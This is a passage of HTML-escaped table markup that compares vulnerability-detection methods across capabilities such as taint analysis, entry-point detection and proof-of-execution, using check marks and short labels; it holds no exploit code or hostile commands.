&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Entry-Point-To-Vuln-Code&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Exploit URL / Payload&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&lt;span style=&quot;color: red; font-family: inherit;&quot;&gt;x&lt;/span&gt;&lt;span style=&quot;font-size: 16pt;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;/&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Framework Dependent&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 85.5pt;&quot; valign=&quot;top&quot; width=&quot;114&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Exploit
  URL&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 89.75pt;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Exploit URL and Payload&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Execution CLI&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Command Line Exploitation&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;CLI-Param-To-Vuln-Code&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;CLI Not
  Supported&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;CLI Entry
  Point Detected&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 85.5pt;&quot; valign=&quot;top&quot; width=&quot;114&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Theoretically Possible&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 89.75pt;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Only via
  Passive&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Flow/Taint Analysis &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Track Sequence of Methods to Activate
  Vulnerable Code&lt;/span&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Irrelevant
  for Technology&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;x&lt;/span&gt;&lt;span style=&quot;font-size: 16pt;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;/&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Key-Word Dependent&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 85.5pt;&quot; valign=&quot;top&quot; width=&quot;114&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;In Effect&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 89.75pt;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;In Effect&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Input Effect on Sink&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Track &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Live&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: red;&quot;&gt; &lt;/span&gt;Input Effect on the Vulnerable Code&lt;/span&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Through Binary Methods&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Performed&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 85.5pt;&quot; valign=&quot;top&quot; width=&quot;114&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Commonly
  Used&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 89.75pt;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Commonly
  Used&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Modified Input Effect&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Track Modified Input Effect on the Vulnerable
  Code&lt;/span&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Payload
  Effect Analysis&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Performed&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 85.5pt;&quot; valign=&quot;top&quot; width=&quot;114&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Performed&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 89.75pt;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Payload
  Effect Analysis&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Execution POC&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Time Delay, External Access, Browser
  Effect, Response Diff&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Commonly
  Used&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Performed&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
